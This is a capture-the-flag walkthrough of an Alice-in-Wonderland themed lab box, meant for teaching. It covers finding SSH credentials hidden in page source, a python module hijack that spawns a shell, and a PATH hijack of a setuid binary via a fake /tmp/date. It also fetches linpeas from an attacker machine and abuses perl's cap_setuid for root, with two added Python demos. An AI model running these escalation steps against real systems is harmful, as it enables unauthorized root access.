Starting with nmap we see port 80 immediately jump out at us, so we will also run DIRB to start some HTTP enumeration. Additionally, an SSH (22) service is running. More on that later.
After a "short" time DIRB found http://<IP>/r/a/. I'll admit, this took me longer than it should have to figure out, but given the context of this room I eventually got to http://<IP>/r/a/b/b/i/t/.
Anytime I land on a webpage during a CTF, the first thing I do is to view the page source.
Here we can see a failed attempt at hiding credentials with "display: none;". That CSS rule only stops the browser from rendering the element; the text is still in the HTML the server sent us. Let's try logging onto SSH with these credentials.
Running "ls" you'll notice that the "root.txt" flag is in alice's directory and we don't have permissions to read this file. Taking a look at the hint for the user flag, we see that "Everything is upside down here." Let's see if the user.txt and root.txt flag locations are swapped.
Let's start looking around for privilege escalation opportunities. The first thing I do once I gain access to a shell is to run "sudo -l". This lists the commands our current user is allowed to run through sudo, and as which users.
Interesting, we can run the python script "walrus_and_the_carpenter.py" as the user rabbit. Running "ls -la" on this script we can see that we cannot write to it. Let's grab the content of the script to see exactly what it does.
I've cut out several of the unnecessary lines of the poem so that you can see the important parts of this script in one screenshot. This script imports the python module "random" and uses it to print random lines of the poem.
Python puts the directory containing the script being run at the front of its module search path (sys.path), so a file named "random.py" placed in the same directory is imported instead of the standard-library module. We can create exactly that file with a body that runs a shell. With just two lines of python we can spawn a shell as the user rabbit.
import os  # only import we need
os.system("/bin/bash")  # executes at import time, as the user sudo started the interpreter as (rabbit)
Execute the walrus script through sudo again. The shadowed module runs as soon as it is imported and we become the user "rabbit".
Let's perform some enumeration as "rabbit". There are several folders each belonging to a unique user.
Inside rabbit's directory there is a setuid binary called "teaParty" that is owned by root and that we can run.
While strings is not installed on this system, we can use grep to pull the printable strings out of the binary instead:
grep -a -o -P '[\x20-\x7E]{4,}' teaParty
Analyzing this output we can see that the binary runs the "date" command without specifying an absolute path, so the shell resolves it through $PATH at run time. We can abuse this by prepending a directory we control to $PATH, placing our own executable named "date" in it, and then running the setuid binary.
First, we must export our path:
export PATH=/tmp:$PATH
echo $PATH
Now, every time a program is called without specifying an absolute path, our shell will first look in /tmp.
Notice that "/tmp" now appears first in $PATH.
Next, let's create our malicious file within /tmp.
touch /tmp/date
chmod +x /tmp/date
Now, add the following contents to our "date" file.
#!/bin/bash
/bin/bash
Now, simply run the "teaParty" binary. When it calls "date", our script in /tmp runs instead and we obtain a shell with the privileges teaParty runs with.
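The PATH hijack from the steps above, reproduced safely so the lookup order can be seen. This is an added example and not the writeup's code: it writes a fake date into a temp directory instead of /tmp, runs an unqualified "date" through /bin/sh the way a system("date") call would, and then runs the real binary by absolute path to show the fix. Two caveats a practitioner should keep in mind: a setuid binary inherits the caller's environment (sudo, by contrast, resets PATH via secure_path), and if the payload shell drops privileges, /bin/bash -p is the next thing to try.

```python
"""Added example: PATH hijack of an unqualified `date` call, reproduced in a sandbox.

Not the writeup's code. The fake `date`, its marker text and the temp directory
are constructed for this demo.
"""
import os
import shutil
import stat
import subprocess
import tempfile

# Stand-in for /tmp/date from the writeup; a real payload would exec /bin/bash.
FAKE_DATE = "#!/bin/sh\necho HIJACKED-by-fake-date\n"


def resolve(cmd, path):
    """First executable named `cmd` in the colon-separated `path` (what sh does)."""
    for d in path.split(":"):
        cand = os.path.join(d, cmd)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def run_demo():
    """Return (resolved_path, hijacked_output, absolute_path_output)."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "date")
        with open(fake, "w") as f:
            f.write(FAKE_DATE)
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)  # chmod +x

        # export PATH=/tmp:$PATH  (here: our temp dir instead of /tmp)
        env = dict(os.environ)
        env["PATH"] = d + ":" + os.environ.get("PATH", "/usr/bin:/bin")
        resolved = resolve("date", env["PATH"])

        # What the binary's system("date") amounts to: /bin/sh -c date, which
        # walks PATH and finds our file first.
        hijacked = subprocess.run("date", shell=True, env=env,
                                  capture_output=True, text=True).stdout

        # The fix on the binary's side: call the program by absolute path.
        real = shutil.which("date", path="/usr/bin:/bin")
        absolute = ""
        if real:
            absolute = subprocess.run([real], env=env,
                                      capture_output=True, text=True).stdout
    return resolved, hijacked, absolute


if __name__ == "__main__":
    resolved, hijacked, absolute = run_demo()
    print("date resolves to:", resolved)
    print("unqualified call :", hijacked.strip())
    print("absolute call    :", absolute.strip())
```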
Navigating to the "hatter" directory, we discover hatter's ssh credentials. This is very helpful in the event the machine restarts on us, or because we have changed the $PATH variable in this shell...
At this point it seems necessary to automate further enumeration. We will accomplish this by pulling linpeas.sh from our attacking machine.
Navigate to "/tmp" on the victim machine, host a simple python server on your attacker machine and wget linpeas.sh from your machine.
Once linpeas.sh is on your victim machine execute "chmod +x linpeas.sh" and run the script.
Anything linpeas prints in red on an orange/yellow background is its marker for a near-certain privilege escalation vector, so we need to pay attention to it. Below you can see that perl has the cap_setuid+ep capability set.
Let's see what perl can do for us on https://gtfobins.github.io/.
Because perl already has cap_setuid+ep, we can simply run the command GTFOBins lists under "Capabilities" for perl to spawn a shell as root.
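Linpeas finds this by running getcap -r / and colouring the result. The added example below (mine, not the writeup's or linpeas' code) does the triage step by hand: it parses getcap output and flags the capabilities that GTFOBins-style one-liners turn straight into root or into reads of protected files. The sample lines are constructed; they cover both output formats getcap has used, the older "path = caps" and the "path caps" form of libcap 2.41 and later. cap_net_raw is deliberately not flagged, since on its own it does not give root.

```python
"""Added example: triage `getcap -r /` output for capabilities worth escalating.

Not from the writeup or linpeas. SAMPLE is constructed, not real system output.
"""
import re
import subprocess

# Capabilities with a known direct path to root or to protected files.
DANGEROUS = {
    "cap_setuid": "can call setuid(0): root shell (perl/python/ruby on GTFOBins)",
    "cap_setgid": "can switch group, e.g. to shadow or disk",
    "cap_dac_read_search": "bypasses read permission checks on any file",
    "cap_dac_override": "bypasses read/write/execute permission checks",
    "cap_sys_admin": "mount, namespaces, many escape paths",
    "cap_sys_ptrace": "attach to and inject into any process",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change ownership of any file",
}

# Constructed sample mixing the old (`path = caps+flags`) and new (`path caps=flags`) formats.
SAMPLE = """\
/usr/bin/perl = cap_setuid+ep
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip
"""

_LINE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>cap_[\w,]+)(?P<flags>[=+][eip]+)?$")


def parse_getcap(text):
    """Map binary path -> set of capability names, accepting either getcap format."""
    result = {}
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue
        result[m.group("path")] = set(m.group("caps").split(","))
    return result


def dangerous(text):
    """Return {path: [(cap, why), ...]} for binaries carrying a capability in DANGEROUS."""
    hits = {}
    for path, caps in parse_getcap(text).items():
        found = [(c, DANGEROUS[c]) for c in sorted(caps) if c in DANGEROUS]
        if found:
            hits[path] = found
    return hits


def scan_live_system():
    """Run getcap on the host (the check linpeas performs) and triage the result."""
    try:
        out = subprocess.run(["getcap", "-r", "/"], capture_output=True, text=True).stdout
    except FileNotFoundError:  # getcap not installed on this box
        return {}
    return dangerous(out)


if __name__ == "__main__":
    for path, reasons in dangerous(SAMPLE).items():
        for cap, why in reasons:
            print(f"{path}: {cap} -> {why}")
```

On a live target, scan_live_system() gives the same view linpeas does; on the sample, both perl binaries and python3.8 are flagged for cap_setuid and the two cap_net_raw entries are left alone.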
We already know where the root flag is. Simply cat its contents.
This room was incredibly engaging and made for a fun learning opportunity. I hope this writeup helped you as much as it helped me retain the information!
